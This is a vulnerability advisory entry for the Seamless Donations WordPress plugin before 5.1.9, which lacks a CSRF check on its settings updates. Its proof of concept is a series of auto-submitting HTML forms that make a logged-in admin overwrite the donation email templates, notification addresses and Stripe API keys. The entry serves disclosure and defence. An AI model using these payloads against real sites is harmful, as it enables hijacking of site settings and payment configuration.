WordPress Plugin Vulnerabilities
Seamless Donations < 5.1.9 - Arbitrary Settings Update via CSRF
Description
The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack
Proof of Concept
<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST"> <input type="text" name="action" value="seamless_donations_tab_templates"> <input type="text" name="seamless_donations_template_email_test" value="evil@example.com"> <input type="text" name="dgx_donate_button_settings_templates_test_email" value="Send Test Email"> </form> <script> document.getElementById("test").submit(); </script> <form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST"> <input type="text" name="action" value="seamless_donations_tab_templates"> <input type="text" name="seamless_donations_template_email_test" value=""> <input type="text" name="dgx_donate_email_name" value="testuserhacked"> <input type="text" name="dgx_donate_email_reply" value="test@example.com"> <input type="text" name="dgx_donate_email_subj" value="Thank you for your donation"> <input type="text" name="dgx_donate_email_body" value="hacked"> <textarea type="text" name="dgx_donate_email_recur"> Some link: https://google.com </textarea> <input type="text" name="dgx_donate_email_desig" value="Your donation has been designated to the [fund] fund."> <input type="text" name="dgx_donate_email_anon" value="You have requested that your donation be kept anonymous. Your name will not be revealed to the public."> <input type="text" name="dgx_donate_email_list" value="Thank you for joining our mailing list. We will send you updates from time-to-time. If at any time you would like to stop receiving emails, please send us an email to be removed from the mailing list."> <input type="text" name="dgx_donate_email_empl" value="You have specified that your employer matches some or all of your donation."> <input type="text" name="dgx_donate_email_trib" value="You have asked to make this donation in honor of or memory of someone else. Thank you! We will notify the honoree within the next 5-10 business days."> <input type="text" name="dgx_donate_email_close" value="Thanks again for your support!"> <input type="text" name="dgx_donate_email_sig" value="Director of Donor Relations"> <input type="text" name="dgx_donate_button_template_settings" value="Save Changes"> </form> <script> document.getElementById("test").submit(); </script> <form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST"> <input type="text" name="action" value="seamless_donations_tab_settings"> <input type="text" name="dgx_donate_organization_name" value="uuuu"> <input type="text" name="dgx_donate_notify_emails" value="test@example.com"> <input type="text" name="dgx_donate_payment_processor_choice" value="STRIPE"> <input type="text" name="dgx_donate_donor_fee_payment" value="NEVER"> <input type="text" name="dgx_donate_button_settings_basics" value="Save Basic Settings"> <input type="text" name="dgx_donate_stripe_server" value="SANDBOX"> <input type="text" name="dgx_donate_live_stripe_api_key" value=""> <input type="text" name="dgx_donate_live_stripe_secret_key" value=""> <input type="text" name="dgx_donate_test_stripe_api_key" value=""> <input type="text" name="dgx_donate_test_stripe_secret_key" value=""> <input type="text" name="dgx_donate_stripe_billing_address" value="auto"> <input type="text" name="dgx_donate_debug_mode" value="OFF"> <input type="text" name="dgx_donate_log_obscure_name" value="on"> </form> <script> document.getElementById("test").submit(); </script> <form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST"> <input type="text" name="action" value="seamless_donations_tab_settings"> <input type="text" name="dgx_donate_organization_name" value="uuuu"> <input type="text" name="dgx_donate_notify_emails" value="test@example.com"> <input type="text" name="dgx_donate_payment_processor_choice" value="STRIPE"> <input type="text" name="dgx_donate_donor_fee_payment" value="NEVER"> <input type="text" name="dgx_donate_button_stripe_settings" value="Update Stripe API Key"> <input type="text" name="dgx_donate_stripe_server" value="SANDBOX"> <input type="text" name="dgx_donate_live_stripe_api_key" value="pk_live_www"> <input type="text" name="dgx_donate_live_stripe_secret_key" value="sk_live_www"> <input type="text" name="dgx_donate_test_stripe_api_key" value="pk_test_www"> <input type="text" name="dgx_donate_test_stripe_secret_key" value="sk_test_www"> <input type="text" name="dgx_donate_stripe_billing_address" value="auto"> <input type="text" name="dgx_donate_debug_mode" value="OFF"> <input type="text" name="dgx_donate_log_obscure_name" value="on"> </form> <script> document.getElementById("test").submit(); </script>
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-05-26 (about 1 years ago)
Added
2022-05-26 (about 1 years ago)
Last Updated
2023-02-21 (about 1 years ago)